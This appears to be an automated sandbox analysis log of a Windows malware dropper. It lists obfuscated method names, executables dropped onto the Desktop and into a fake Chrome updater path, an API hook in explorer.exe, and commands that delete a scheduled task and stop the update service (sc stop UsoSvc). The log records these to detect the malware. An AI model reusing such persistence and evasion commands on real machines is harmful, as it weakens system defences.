                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, hrS1OKzdA0DbnXjthy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D6pdCRew8p', 'YTKdS0nA3k', 'Fy4dhK7Xp6', 'hGxdYQdk1m', 'AKSd8Ko9gf', 'R6QddvA01o', 'w8Rdoxsn9K'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, BU4hSv4Na1c48ACXsU.csHigh entropy of concatenated method names: 'cZT7rqoele', 'YST7DAJWpE', 'Uuf7X9itQT', 'nW371jXUGW', 'kqS7Sxf2dO', 'l177hfYZeT', 'sTd7YBBdkB', 'apc78Ls49P', 'Qqc7dohgto', 'Pkb7oqKP37'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, FxEVFXkKaPOnpESCK3.csHigh entropy of concatenated method names: 'NmlYmeXeau', 'xs5YgrYqvD', 'ToString', 'r62Ynh6Vha', 'KV0YVpuQ6c', 'hhNY72GEsf', 'ICmYcxCrI4', 'BWyYqpGpNA', 'j5AYfnapZF', 'feiYHEgG30'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, BdT4PgWkWIhghle95B.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'tdEFTPKAQJ', 'WmoFI2kMqU', 'Q0CFzRKb43', 'eGyaUec38m', 'zZgaRhZH1A', 'QCYaFs8tsG', 'VE3aaH1Adu', 'gSyUVGhDcWtBMZH3VYi'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, ksgyXk8IESKtxbdnht.csHigh entropy of concatenated method names: 'dRm8nkIj12', 'zlf8VkFZTh', 'NVU87qGU2t', 'KEt8c2kFhW', 'J0l8q1yNlC', 'dxQ8ffyXie', 'oWw8HW14h8', 'REF8NSXBmK', 'VCm8m1K3c6', 'joK8gRyn0k'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, CKXHsr7fVo6pg31t6V.csHigh entropy of concatenated method names: 'T1KavjXnOL', 'Rl6anoZSAX', 'tZYaVyme3b', 'ypYa7vQoWd', 'vIQacJB1BH', 'YCBaqMB7VH', 'lR7af4dwfv', 'oLyaHFjOLZ', 'aVwaNs568p', 'Q6Wam2suEq'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, vulbWcXB7FYT60l5PR.csHigh entropy of concatenated method names: 'NPl8i4LPRO', 'Yoy8JSkIZx', 'er6896nTih', 'XSG8uXl9F7', 'm2H8eZYg3y', 'qZe8sAkrOM', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, yTifNaqMykSESGEUH6.csHigh entropy of concatenated method names: 'i8idRJwfDf', 'BxydaSyctj', 'gYFdPioyvp', 'ujjdn0jy2s', 'P9rdVEg1jf', 'gQidcX5lyB', 'D8ldqgQihc', 't148t8UKtv', 'TAA8x2hcDw', 'nhV8THwL4O'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, Jq1UGkJ2VZDwyESrPA.csHigh entropy of concatenated method names: 'B8eqv3or3b', 'q7DqV7IvAl', 'T3kqcivprj', 'uwXqfMSZQx', 'Kt5qHAjZZj', 'zkfclrhAWW', 'nQgcEgeHbx', 'PUYctmZcx5', 'hMAcxy4YmW', 'igOcTYJ2w9'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, wJZBj0yLp8m4hHGtBk.csHigh entropy of concatenated method names: 'hc3fWbBITo', 'NiHfyOo1FW', 'CZDfkeV4UX', 'nndfrGMO2N', 'ELjfpKZLap', 'OPnfDjtoog', 'smMfG9jnpy', 'KelfX5t8wU', 'jMbf121dgN', 'sAwf4YSBTL'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, O8jqyfe0oZtjZOr0Upx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PU4oe5uIYC', 'TJQobfn6Lj', 'K6jo6VRrZl', 'vdgo38pplL', 'urbol0IBby', 'm6KoEFvlFK', 'gHOotmwtdT'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, zqtaHhxEZc3pdQNfIL.csHigh entropy of concatenated method names: 'eXXkOMMOM', 'AovriP4vn', 'KpUDPmUny', 'IiEGqxvND', 'tRu1sdqmp', 'oey4rcOZo', 'SmmP8gfBny9AciTbBD', 'XkxLYxpW54jUVgcx39', 'sti8HoMrD', 'HqOoxg1si'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, juhWCevcuygL56DppD.csHigh entropy of concatenated method names: 'wbvRf3MtNt', 'FUTRHaCkgY', 'FG6RmF1JXD', 'KndRgIXYmb', 'iWyRS4uGXb', 'uVfRhZUsiQ', 'LyyiaElm51ATcmA0Tt', 'TqUfxYGu5c3g5JKmld', 'bhIRRuss1r', 'Yy9RaNCJhQ'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, lEBSbmeeyBZf7LIer7J.csHigh entropy of concatenated method names: 'ToString', 'u7ToaVdM0n', 'L8EoPBr0WQ', 'eObovtoytu', 'VqXon0rGv5', 'M3goVCjeWx', 'kYwo7Qu2YW', 'Vvsoca8MPE', 'YkKHptnZUiyIyDYXmxC', 'jT7NPxnXK4o6yxBeKNy'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, rnNYqZNnZdJp5kZbQg.csHigh entropy of concatenated method names: 'fhecpyGYEo', 'RowcGxMWuN', 'arQ79G6tjH', 'GpU7udJss0', 'JZN7srNwCQ', 'VC77ZYHh2S', 'zFv7LioGcm', 'O6G7A8XscM', 'JWk7K8AvRx', 'Km770FUZv2'
                    Source: 3.2.audiodgse.exe.23a0000.0.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\a\smss.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\a\setup.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\a\foto1661.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\a\kung.exeJump to dropped file
                    Source: C:\Users\user\Desktop\a\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                    Source: C:\Users\user\Desktop\a\autolog.exeFile created: C:\Users\user\AppData\Local\Temp\pznhcda.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\a\audiodgse.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\a\sbinzx.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\a\tus.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\a\davincizx.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\a\smss.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\a\201.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\a\autolog.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                    Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE9
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\a\autolog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\a\autolog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\a\autolog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
